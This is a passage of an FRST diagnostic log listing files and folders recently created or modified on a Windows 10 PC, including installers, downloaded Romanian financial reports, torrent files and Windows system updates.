2016-09-29 10:15 - 2016-09-29 10:15 - 00170078 _____ C:\Users\admin\Downloads\6124_FP_20160928183706_raport-curent-materiale-de-prezentare-AGA-11-OCT-2016.pdf
2016-09-29 10:13 - 2016-09-29 10:13 - 00300388 _____ C:\Users\admin\Downloads\6124_FP_20160928170015_notificare-saptamanala-program-rascumparare--22---27-septemb.pdf
2016-09-29 10:08 - 2016-09-29 10:08 - 00188108 _____ C:\Users\admin\Downloads\6124_FP_20160928184159_raport-curent-actualizare-privind-programele-de-rascumparare.pdf
2016-09-29 09:20 - 2016-09-29 09:20 - 00000000 ____D C:\Users\admin\AppData\Roaming\fontconfig
2016-09-29 09:19 - 2016-09-29 09:25 - 00000000 ____D C:\Users\admin\AppData\Roaming\Aegisub
2016-09-29 09:18 - 2016-09-29 09:19 - 00000000 ____D C:\Program Files\Aegisub
2016-09-29 09:18 - 2016-09-29 09:18 - 00001139 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASSDraw3.lnk
2016-09-29 09:18 - 2016-09-29 09:18 - 00001110 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Aegisub.lnk
2016-09-29 09:17 - 2016-09-29 09:18 - 19602087 _____ (Aegisub Team ) C:\Users\admin\Downloads\Aegisub-3.2.2-32.exe
2016-09-29 08:53 - 2016-10-03 14:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Subtitle Edit
2016-09-29 08:53 - 2016-09-29 09:05 - 00000000 ____D C:\Users\admin\AppData\Roaming\Subtitle Edit
2016-09-29 08:53 - 2016-09-29 08:53 - 00002104 _____ C:\Users\admin\Desktop\Subtitle Edit.lnk
2016-09-29 08:53 - 2016-09-29 08:53 - 00000000 ____D C:\Program Files\Subtitle Edit
2016-09-28 11:57 - 2016-09-28 12:13 - 00000000 ____D C:\Users\admin\AppData\Roaming\obs-studio
2016-09-28 11:50 - 2016-09-28 11:51 - 00000000 ____D C:\Program Files\obs-studio
2016-09-28 11:49 - 2016-09-28 11:50 - 97260048 _____ (obsproject.com) C:\Users\admin\Downloads\OBS-Studio-0.16.0-Full-Installer.exe
2016-09-28 11:43 - 2016-09-28 11:43 - 00276491 _____ C:\Users\admin\Downloads\1787_TLV-Tranzactii pers initiate2 26.09.2016.pdf
2016-09-27 11:06 - 2016-09-27 11:06 - 01038154 _____ C:\Users\admin\Downloads\ordin 4.577_2016.pdf
2016-09-27 10:23 - 2016-09-27 10:23 - 00175437 _____ C:\Users\admin\Downloads\6124_FP_20160926184037_raport-curent-propunere-distributie-numerar-speciala_26-sept.pdf
2016-09-27 10:14 - 2016-09-27 10:14 - 00000000 ____D C:\ProgramData\ABBYY
2016-09-23 15:51 - 2016-09-23 15:51 - 00236050 _____ C:\Users\admin\Downloads\6124_FP_20160923113555_raport-curent-vanzare-partiala-OMV-Petrom_23-sept-2016.pdf
2016-09-23 13:16 - 2016-09-23 13:16 - 00001053 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Livestream Producer - Windows.lnk
2016-09-23 13:16 - 2016-09-23 13:16 - 00001047 _____ C:\Users\Public\Desktop\Livestream Producer - Windows.lnk
2016-09-23 13:15 - 2016-10-03 14:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Livestream Producer
2016-09-23 13:15 - 2016-09-23 13:16 - 00000000 ____D C:\Users\admin\AppData\Local\Producer
2016-09-23 13:15 - 2016-09-23 13:16 - 00000000 ____D C:\Program Files\Livestream Producer
2016-09-23 12:32 - 2016-10-03 14:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OBS Studio
2016-09-23 12:32 - 2016-09-28 11:52 - 00001239 _____ C:\Users\Public\Desktop\OBS Studio.lnk
2016-09-23 12:22 - 2016-09-23 12:23 - 00020992 _____ C:\Users\admin\Downloads\DE COMPLETAT situatia unitatilor de invatamant 2016 septembrie (1).xls
2016-09-23 12:21 - 2016-09-23 12:30 - 97255680 _____ C:\Users\admin\Downloads\OBS-Studio-0.15.4-With-Browser-Installer.exe
2016-09-22 12:15 - 2016-10-03 08:54 - 00000000 ____D C:\Program Files\Mozilla Firefox
2016-09-22 11:51 - 2016-09-22 11:51 - 00420108 _____ C:\Users\admin\Downloads\6124_FP_20160921194259_raport-curent-convocator-AGA-31-octombrie-2016_21-sept-2016.pdf
2016-09-22 09:16 - 2016-10-03 14:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ESET
2016-09-22 09:16 - 2016-09-22 09:16 - 00002106 _____ C:\Users\Public\Desktop\ESET Banking & Payment protection.lnk
2016-09-22 09:16 - 2016-09-22 09:16 - 00000000 ____D C:\ProgramData\ESET
2016-09-22 09:15 - 2016-09-22 09:15 - 00000000 ____D C:\Program Files\ESET
2016-09-21 10:28 - 2016-09-21 10:28 - 00000000 ____D C:\Users\admin\Documents\Lightshot
2016-09-20 11:52 - 2016-09-20 11:53 - 45032224 _____ C:\Users\admin\Downloads\Firefox-Setup-47-0.exe
2016-09-20 11:51 - 2016-09-20 11:51 - 00242136 _____ C:\Users\admin\Downloads\Firefox Setup Stub 48.0.2.exe
2016-09-20 09:52 - 2016-09-20 09:52 - 00278100 _____ C:\Users\admin\Downloads\1787_TLV-Tranzactii pers initiate 16.09.2016.pdf
2016-09-20 09:51 - 2016-09-20 09:51 - 00279942 _____ C:\Users\admin\Downloads\1787_TLV-Tranzactii pers initiate2 16.09.2016.pdf
2016-09-19 14:47 - 2016-09-19 14:47 - 00011776 _____ C:\Users\admin\Downloads\MODEL - situatia unitatilor de invatamant 2016 septembrie-.xls
2016-09-19 14:47 - 2016-09-19 14:47 - 00009728 _____ C:\Users\admin\Downloads\DE COMPLETAT situatia unitatilor de invatamant 2016 septembrie.xls
2016-09-19 14:07 - 2016-09-19 14:07 - 00017408 _____ C:\Users\admin\Downloads\FP - DIVIDENDE 2015 SI 2016 (1).xls
2016-09-19 14:06 - 2016-09-19 14:06 - 00164963 _____ C:\Users\admin\Downloads\6124_FP_20160913223240_raport-curent-decontare.pdf
2016-09-19 14:05 - 2016-09-19 14:05 - 00298072 _____ C:\Users\admin\Downloads\6124_FP_20160915112933_notificare-saptamanala-program-rascumparare--8---14-septembr (2).pdf
2016-09-19 13:37 - 2016-09-19 13:37 - 00000000 ____D C:\Users\admin\Downloads\Fiºiere ataºate_2016919
2016-09-19 10:19 - 2016-09-19 10:19 - 00014284 _____ C:\Users\admin\Downloads\Film Complet en Francais (2016) 1080p BluRay Rip DD5.1.x264-HD.torrent
2016-09-16 15:39 - 2016-09-16 15:39 - 00298072 _____ C:\Users\admin\Downloads\6124_FP_20160915112933_notificare-saptamanala-program-rascumparare--8---14-septembr (1).pdf
2016-09-16 12:26 - 2016-09-16 12:26 - 00012892 _____ C:\Users\admin\Downloads\[kat.cr]microsoft.office.pro.plus.2016.v16.0.4266.1003.rtm.activator.techtools.torrent
2016-09-16 11:34 - 2016-09-16 11:34 - 00290699 _____ C:\Users\admin\Downloads\1787_TLV_20160915105648_BTComunicat-de-presa_Identitate-de-brand-noua_15.09.2016.pdf
2016-09-15 15:30 - 2016-09-15 15:32 - 00000000 ____D C:\Users\admin\Downloads\Cum sa ai televiziune gratis
2016-09-15 13:28 - 2016-09-15 13:28 - 00298072 _____ C:\Users\admin\Downloads\6124_FP_20160915112933_notificare-saptamanala-program-rascumparare--8---14-septembr.pdf
2016-09-15 12:28 - 2016-09-15 12:28 - 00000000 ____D C:\Users\admin\AppData\Roaming\.tvmaxe
2016-09-15 12:26 - 2016-10-03 14:45 - 00000000 ____D C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SopCast
2016-09-15 12:26 - 2016-09-15 12:26 - 00001024 _____ C:\Users\admin\Desktop\SopCast.lnk
2016-09-15 12:26 - 2016-09-15 12:26 - 00000000 ____D C:\Program Files\SopCast
2016-09-13 16:13 - 2016-09-13 16:13 - 00001076 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 11.lnk
2016-09-13 16:13 - 2016-09-13 16:13 - 00001064 _____ C:\Users\Public\Desktop\TeamViewer 11.lnk
2016-09-13 16:11 - 2016-09-13 16:11 - 12327328 _____ (TeamViewer GmbH) C:\Users\admin\Downloads\TeamViewer_Setup-aayn.exe
2016-09-13 12:56 - 2016-09-13 12:56 - 00064083 _____ C:\Users\admin\Downloads\AMS_Report_1473760592179.pdf
2016-09-13 12:43 - 2016-09-13 12:43 - 00001067 _____ C:\Users\admin\Downloads\Windows.10.Pro.Permanent.Activator-2016-FiLELiST.torrent
2016-09-13 12:40 - 2016-09-13 12:40 - 00171336 _____ C:\Users\admin\Downloads\Microsoft.Windows.10.PRO.1511.Build.10586.OEM.June.2016.FULL-FILELIST.torrent
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2016-10-13 12:03 - 2016-06-14 08:57 - 00018449 _____ C:\Users\admin\Downloads\FRST.txt
2016-10-13 12:00 - 2016-06-14 08:57 - 00000000 ____D C:\FRST
2016-10-13 12:00 - 2016-06-14 08:56 - 01757184 _____ (Farbar) C:\Users\admin\Downloads\FRST.exe
2016-10-13 11:44 - 2016-01-20 12:42 - 00000000 ___RD C:\Users\admin\Google Drive
2016-10-13 11:43 - 2015-04-20 13:02 - 00000000 ___RD C:\Users\admin\OneDrive
2016-10-13 11:41 - 2016-07-16 05:22 - 00524288 _____ C:\WINDOWS\system32\config\BBI
2016-10-13 11:36 - 2016-03-18 17:29 - 00000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2016-10-13 11:00 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-10-13 10:49 - 2016-07-16 11:29 - 00000000 ___SD C:\WINDOWS\system32\DiagSvcs
2016-10-13 10:49 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2016-10-13 10:49 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\migwiz
2016-10-13 10:48 - 2016-07-16 11:29 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2016-10-13 10:48 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\ShellExperiences
2016-10-13 10:48 - 2016-07-16 11:29 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2016-10-13 10:48 - 2016-07-16 11:28 - 00000000 ____D C:\WINDOWS\INF
2016-10-13 10:45 - 2016-07-16 11:19 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-10-13 09:01 - 2016-07-16 11:29 - 00000000 ___HD C:\Program Files\WindowsApps
2016-10-12 11:42 - 2014-11-11 11:04 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-10-12 11:20 - 2014-11-11 11:04 - 141042968 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-10-12 08:33 - 2016-07-01 16:34 - 00000000 ____D C:\Program Files\InfraRecorder
2016-10-11 11:12 - 2016-01-18 10:26 - 00000000 ____D C:\Users\admin\AppData\Roaming\vlc
2016-10-10 09:47 - 2016-06-23 14:31 - 00206472 _____ (ESET) C:\WINDOWS\system32\Drivers\eamonm.sys
2016-10-10 09:10 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-10-07 10:02 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2016-10-07 09:51 - 2014-11-12 13:03 - 00000000 ____D C:\Users\admin\AppData\Roaming\uTorrent
2016-10-06 09:59 - 2016-01-25 12:26 - 00000000 ____D C:\Users\admin\AppData\Local\Packages
2016-10-06 08:54 - 2015-12-09 10:43 - 00000690 _____ C:\WINDOWS\Tasks\G2MUploadTask-S-1-5-21-4142771536-1505296934-324239511-1000.job
2016-10-06 08:54 - 2015-12-09 10:43 - 00000594 _____ C:\WINDOWS\Tasks\G2MUpdateTask-S-1-5-21-4142771536-1505296934-324239511-1000.job
2016-10-05 17:32 - 2014-11-10 22:59 - 00389418 __RSH C:\bootmgr
2016-10-04 10:08 - 2014-12-18 12:31 - 00002226 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-10-04 08:56 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\appcompat
2016-10-04 01:28 - 2016-07-16 11:30 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template
2016-10-04 01:19 - 2016-07-16 13:18 - 00000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2016-10-04 01:19 - 2016-07-16 11:29 - 00000000 ___SD C:\WINDOWS\system32\F12
2016-10-04 01:19 - 2016-07-16 11:29 - 00000000 ___SD C:\WINDOWS\system32\dsc
2016-10-04 01:19 - 2016-07-16 11:29 - 00000000 ___RD C:\Program Files\Windows Defender
2016-10-04 01:19 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\setup
2016-10-04 01:19 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\oobe
2016-10-04 01:19 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\lv-LV
2016-10-04 01:19 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\lt-LT
2016-10-04 01:19 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\et-EE
2016-10-04 01:19 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\es-MX
2016-10-04 01:19 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\en-GB
2016-10-04 01:19 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-10-04 01:19 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\Provisioning
2016-10-04 01:19 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\bcastdvr
2016-10-04 01:19 - 2016-07-16 05:22 - 00000000 ____D C:\WINDOWS\system32\Dism
2016-10-04 01:02 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\inetsrv
2016-10-04 01:02 - 2016-07-16 11:26 - 01003008 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqqm.dll
2016-10-04 01:02 - 2016-07-16 11:26 - 00621568 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqsnap.dll
2016-10-04 01:02 - 2016-07-16 11:26 - 00562176 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqutil.dll
2016-10-04 01:02 - 2016-07-16 11:26 - 00265728 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa.dll
2016-10-04 01:02 - 2016-07-16 11:26 - 00172032 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisRtl.dll
2016-10-04 01:02 - 2016-07-16 11:26 - 00160768 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqrt.dll
2016-10-04 01:02 - 2016-07-16 11:26 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mqac.sys
2016-10-04 01:02 - 2016-07-16 11:26 - 00104448 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqlogmgr.dll
2016-10-04 01:02 - 2016-07-16 11:26 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa.tlb
2016-10-04 01:02 - 2016-07-16 11:26 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa30.tlb
2016-10-04 01:02 - 2016-07-16 11:26 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa20.tlb
2016-10-04 01:02 - 2016-07-16 11:26 - 00050688 _____ (Microsoft Corporation) C:\WINDOWS\system32\admwprox.dll
2016-10-04 01:02 - 2016-07-16 11:26 - 00044544 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqbkup.exe
2016-10-04 01:02 - 2016-07-16 11:26 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa10.tlb
2016-10-04 01:02 - 2016-07-16 11:26 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\ahadmin.dll
2016-10-04 01:02 - 2016-07-16 11:26 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqsvc.exe
2016-10-04 01:02 - 2016-07-16 11:26 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisreset.exe
2016-10-04 01:02 - 2016-07-16 11:26 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqcertui.dll
2016-10-04 01:02 - 2016-07-16 11:26 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\system32\wamregps.dll
2016-10-04 01:02 - 2016-07-16 11:26 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisrstap.dll
2016-10-04 01:02 - 2016-07-16 11:26 - 00009096 _____ C:\WINDOWS\system32\msmqtrc.mof
2016-10-03 23:09 - 2016-07-16 11:31 - 00828408 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerApp.exe
2016-10-03 23:09 - 2016-07-16 11:31 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerCPLApp.cpl
2016-10-03 16:03 - 2015-03-18 10:16 - 00000400 __RSH C:\ProgramData\ntuser.pol
2016-10-03 15:30 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\rescache
2016-10-03 15:29 - 2016-07-16 11:29 - 00000000 ____D C:\ProgramData\USOPrivate
2016-10-03 15:29 - 2016-01-25 12:27 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-10-03 15:16 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase
2016-10-03 15:16 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\Registration
2016-10-03 15:16 - 2015-10-30 08:48 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2016-10-03 15:09 - 2016-01-25 12:09 - 00021412 _____ C:\WINDOWS\system32\emptyregdb.dat
2016-10-03 15:07 - 2016-07-16 11:29 - 00000000 __RHD C:\Users\Public\Libraries
2016-10-03 15:07 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\Media
2016-10-03 14:52 - 2016-08-30 09:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lightshot
2016-10-03 14:52 - 2016-07-16 11:29 - 00000000 ___SD C:\WINDOWS\Downloaded Program Files
2016-10-03 14:52 - 2016-07-07 12:20 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDF Converter Elite
2016-10-03 14:52 - 2016-07-01 16:34 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\InfraRecorder
2016-10-03 14:52 - 2016-06-30 10:48 - 00000000 ____D C:\WINDOWS\system32\DRVSRC
2016-10-03 14:52 - 2016-06-30 10:48 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KONICA MINOLTA 226 Scanner
2016-10-03 14:52 - 2016-05-23 14:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FreeOCR
2016-10-03 14:52 - 2016-05-23 13:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\newfolder1
2016-10-03 14:52 - 2016-04-25 09:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EaseUS Partition Master 10.8
2016-10-03 14:52 - 2016-04-21 12:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
2016-10-03 14:52 - 2016-04-06 12:32 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java Web Start
2016-10-03 14:52 - 2016-03-23 10:24 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Free Alarm Clock
2016-10-03 14:52 - 2016-02-15 09:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kolor Autopano Giga 4.0
2016-10-03 14:52 - 2016-02-10 13:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDF-XChange PDF Viewer
2016-10-03 14:52 - 2016-01-28 10:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinPcap
2016-10-03 14:52 - 2016-01-20 12:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive
2016-10-03 14:52 - 2016-01-18 10:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
2016-10-03 14:52 - 2015-11-02 10:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Whiteboard V3.0.150611
2016-10-03 14:52 - 2015-09-08 15:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MetaTrader FIX
2016-10-03 14:52 - 2015-09-03 12:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FXCC - MetaTrader 4
2016-10-03 14:52 - 2015-08-24 09:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FileSeek
2016-10-03 14:52 - 2015-04-27 09:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Partition Bad Disk
2016-10-03 14:52 - 2015-04-03 10:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon iP4300 Manual
2016-10-03 14:52 - 2015-04-03 10:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon iP4300
2016-10-03 14:52 - 2015-03-26 16:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Doublekiller Pro
2016-10-03 14:52 - 2015-03-24 13:28 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Remove Empty Directories
2016-10-03 14:52 - 2015-03-23 15:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GoodSync
2016-10-03 14:52 - 2015-03-12 13:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EDU Stiinte ale naturii 3
2016-10-03 14:52 - 2015-02-16 15:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ghostscript
2016-10-03 14:52 - 2015-02-11 15:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FXCM MetaTrader 4
2016-10-03 14:52 - 2015-02-09 13:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DVDVideoSoft
2016-10-03 14:52 - 2015-02-06 10:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Convert AVI to MP4
2016-10-03 14:52 - 2015-02-05 17:14 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinFF
2016-10-03 14:52 - 2015-02-02 09:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MetaTrader 4 FinFX
2016-10-03 14:52 - 2015-01-30 11:45 - 00000000 ____D C:\WINDOWS\system32\Cult3D
2016-10-03 14:52 - 2015-01-29 16:14 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MetaTrader 4 IC Markets
2016-10-03 14:52 - 2015-01-22 13:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MetaTrader-Admiral Markets
2016-10-03 14:52 - 2015-01-22 11:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MetaTrader 4 Admiral Markets AS
2016-10-03 14:52 - 2015-01-08 10:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media
2016-10-03 14:52 - 2015-01-08 10:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Xvid
2016-10-03 14:52 - 2015-01-08 10:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\x264vfw
2016-10-03 14:52 - 2015-01-06 15:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CamStudio 2.7
2016-10-03 14:52 - 2014-12-15 16:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mobile Partner
2016-10-03 14:52 - 2014-12-03 11:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Disable Autorun
2016-10-03 14:52 - 2014-11-24 13:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ColorPage-HR7X Slim V2.1
2016-10-03 14:52 - 2014-11-18 10:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2016-10-03 14:52 - 2014-11-17 10:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NetBeans
2016-10-03 14:52 - 2014-11-14 13:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Digi Net Mobile
2016-10-03 14:52 - 2014-11-14 09:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MetaTrader 5
2016-10-03 14:52 - 2014-11-12 15:47 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexmark
2016-10-03 14:52 - 2014-11-12 12:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MagicDisc
2016-10-03 14:52 - 2014-11-12 11:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinISO
2016-10-03 14:52 - 2014-11-12 11:24 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft LifeCam
2016-10-03 14:52 - 2014-11-11 13:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MWSnap
2016-10-03 14:51 - 2016-06-27 10:59 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer Crystal Eye Webcam
2016-10-03 14:51 - 2016-05-27 13:12 - 00000000 ____D C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CD to MP3 Freeware
2016-10-03 14:51 - 2016-05-09 13:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ActiveState ActiveTcl 8.6.4.1
2016-10-03 14:51 - 2016-02-29 14:12 - 00000000 ____D C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinDirStat
2016-10-03 14:51 - 2015-10-11 15:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Aquila Technology
2016-10-03 14:51 - 2015-03-10 18:56 - 00000000 ____D C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games
2016-10-03 14:51 - 2015-03-05 13:21 - 00000000 ____D C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows 7 USB DVD Download Tool
2016-10-03 14:51 - 2015-02-12 19:07 - 00000000 ____D C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\IC Markets cTrader
2016-10-03 14:51 - 2015-01-05 13:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip
2016-10-03 14:51 - 2014-11-18 10:58 - 00000000 ____D C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2016-10-03 14:51 - 2014-11-11 14:07 - 00000000 ____D C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\IrfanView
2016-10-03 14:50 - 2016-07-16 11:29 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-10-03 14:50 - 2015-10-30 08:13 - 00000000 ____D C:\Users\Default.migrated
2016-10-03 14:47 - 2016-07-16 13:15 - 00000000 ____D C:\WINDOWS\OCR
2016-10-03 14:47 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\spool
2016-10-03 14:47 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\IME
2016-10-03 14:47 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\schemas
2016-10-03 14:47 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2016-10-03 14:47 - 2016-04-21 15:13 - 00000000 __SHD C:\WINDOWS\system32\AI_RecycleBin
2016-10-03 14:47 - 2015-10-30 09:58 - 00000000 ____D C:\WINDOWS\ShellNew
2016-10-03 14:47 - 2015-04-03 10:13 - 00000000 ___HD C:\WINDOWS\system32\CanonIJ Uninstaller Information
2016-10-03 14:47 - 2015-01-06 13:58 - 00000000 ____D C:\WINDOWS\system32\MTSLog
2016-10-03 14:47 - 2014-11-17 10:49 - 00000000 ____D C:\WINDOWS\system32\appmgmt
2016-10-03 14:47 - 2014-11-13 09:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2016-10-03 14:47 - 2011-04-12 05:24 - 00000000 ___RD C:\Users\Public\Recorded TV
2016-10-03 14:46 - 2016-09-01 11:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bandicam
2016-10-03 14:46 - 2016-07-16 11:29 - 00000000 __SHD C:\Program Files\Windows Sidebar
2016-10-03 14:46 - 2016-07-16 11:29 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2016-10-03 14:46 - 2016-05-23 10:20 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DjVuLibre
2016-10-03 14:46 - 2015-05-11 11:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bullzip
2016-10-03 14:46 - 2015-03-05 18:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GnuWin32
2016-10-03 14:46 - 2009-07-14 05:37 - 00000000 ___HD C:\WINDOWS\system32\GroupPolicy
2016-10-03 14:45 - 2014-12-18 12:10 - 00000000 ____D C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ScenicReflections
